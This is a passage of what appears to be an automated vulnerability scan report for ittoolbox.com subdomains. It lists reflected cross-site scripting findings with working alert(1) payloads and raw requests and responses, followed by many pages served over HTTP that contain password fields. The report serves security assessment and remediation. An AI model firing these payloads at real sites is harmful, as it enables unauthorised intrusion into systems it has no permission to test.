User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64101
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=up3ioy3qkgfjhf45mcfgsr45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Visual Basi ...[SNIP]... null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fvisualbasic.ittoolbox.com%2fDefault.aspx%3f5f46f'-alert(1)-'e6df936efc7%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.127. http://webdesign.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://webdesign.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee5ed"style%3d"x%3aexpression(alert(1))"f7194a0e58c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee5ed"style="x:expression(alert(1))"f7194a0e58c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?ee5ed"style%3d"x%3aexpression(alert(1))"f7194a0e58c=1 HTTP/1.1
Host: webdesign.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79637
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=00e2w3azkf33b545g112yh2z; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Web Design ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://webdesign.ittoolbox.com/Default.aspx?ee5ed"style="x:expression(alert(1))"f7194a0e58c=1" /> ...[SNIP]...
3.128. http://webdesign.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://webdesign.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab989'-alert(1)-'b6f9a2d805d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ab989'-alert(1)-'b6f9a2d805d=1 HTTP/1.1
Host: webdesign.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79522
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uxlfv345zhqpvpeuonz2kv45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Web Design ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fwebdesign.ittoolbox.com%2fDefault.aspx%3fab989'-alert(1)-'b6f9a2d805d%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.129. http://windows.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://windows.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5da5"style%3d"x%3aexpression(alert(1))"772a40a5363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5da5"style="x:expression(alert(1))"772a40a5363 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?e5da5"style%3d"x%3aexpression(alert(1))"772a40a5363=1 HTTP/1.1
Host: windows.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 77834
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hru05fay2kpqom45r51hkl55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://windows.ittoolbox.com/Default.aspx?e5da5"style="x:expression(alert(1))"772a40a5363=1" /> ...[SNIP]...
3.130. http://windows.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://windows.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe485'-alert(1)-'016acc0ce27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fe485'-alert(1)-'016acc0ce27=1 HTTP/1.1
Host: windows.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 77719
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pku3pkzbr11csbm3zmo51i45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... r != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fwindows.ittoolbox.com%2fDefault.aspx%3ffe485'-alert(1)-'016acc0ce27%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.131. http://wireless.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://wireless.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d3b"style%3d"x%3aexpression(alert(1))"945885bc9e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56d3b"style="x:expression(alert(1))"945885bc9e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?56d3b"style%3d"x%3aexpression(alert(1))"945885bc9e1=1 HTTP/1.1
Host: wireless.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73740
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wgga4r45yhrf2sa5hxcqbv55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Wireless Co ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://wireless.ittoolbox.com/Default.aspx?56d3b"style="x:expression(alert(1))"945885bc9e1=1" /> ...[SNIP]...
3.132. http://wireless.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://wireless.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4bba'-alert(1)-'d2be5206969 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c4bba'-alert(1)-'d2be5206969=1 HTTP/1.1 Host: wireless.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73627 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=j4evph55wxm3fduifcqxhhew; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Wireless Co ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fwireless.ittoolbox.com%2fDefault.aspx%3fc4bba'-alert(1)-'d2be5206969%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
4. Cleartext submission of password
There are 89 instances of this issue:
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET / HTTP/1.1 Host: businessintelligence.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79300 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lgzfjg45p5p4ttjbryycmjiv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... </div> <form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm"> <div> ...[SNIP]... <div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="<% =btnSignIn.ClientID %>" /></div> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70865 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ev3vw13ts4uun2552nfwiz45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:19 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/blogs/
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /blogs/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 85344 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sthdbdnv4isdq155nf5krjic; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:21 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/directory/
The form contains the following password field:
m$txtSignin_Password
Request
GET /directory/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 52564 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:34 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/documents/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET /documents/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 28204 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=kqpydg55prajw345gnpd1jaz; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:29 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/events/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET /events/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 38997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uu0vpmjgqupns155oiaxug55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:32 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/groups/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /groups/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 131235 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ttokbo25mimfaly03xopef55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:23 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/research/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /research/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 96466 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mqlx3145uwj1pknllf1r5455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:29 GMT Connection: close
GET /subscriptions/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 27989 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vzkaha55kglahd45pvrgqp2s; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:33 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cloud.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: cloud.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 56007 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=edr0xeykfwnzlf55wgzg3zyo; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:35 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://crm.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: crm.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82725 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=2ge150zsf5orj4451zm2nlzm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:39 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://database.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: database.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 84329 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ra1d4q2rs54sn03stt4bip55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:38 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://datacenter.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: datacenter.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60090 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wgr3vvq5eg30jq45klsivcfv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:41 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://datawarehouse.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: datawarehouse.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72791 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ivrlt045uzzhvb45t5knzy55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://eai.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: eai.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71618 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=4d5wgz45zmrk1tj0f23ykr55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://emergingtech.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: emergingtech.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47575 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vhyrxg55jlanffvxx24ekzek; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:43 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://erp.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: erp.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74629 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=11lky4ffifxs05zpvlu4qv55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:46 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://finance.toolbox.com/default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: finance.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81717 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:49 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://hardware.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: hardware.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78653 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3wjpn4yajv3hcfa0fidd3prk; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:50 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://infor.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: infor.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 54154 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=laxlg3yxtwdispubbh1xwd45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:00 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://it.toolbox.com/groups/
The form contains the following password field:
m$txtSignin_Password
Request
GET /groups/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79052 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Groups
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://java.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: java.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 59140 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=oyzpf135dvjl5u4503tynefb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:01 GMT Connection: close
GET / HTTP/1.1 Host: knowledgemanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71256 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=b5wett3jdmxpvtvb4e4glymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:06 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://linux.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: linux.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
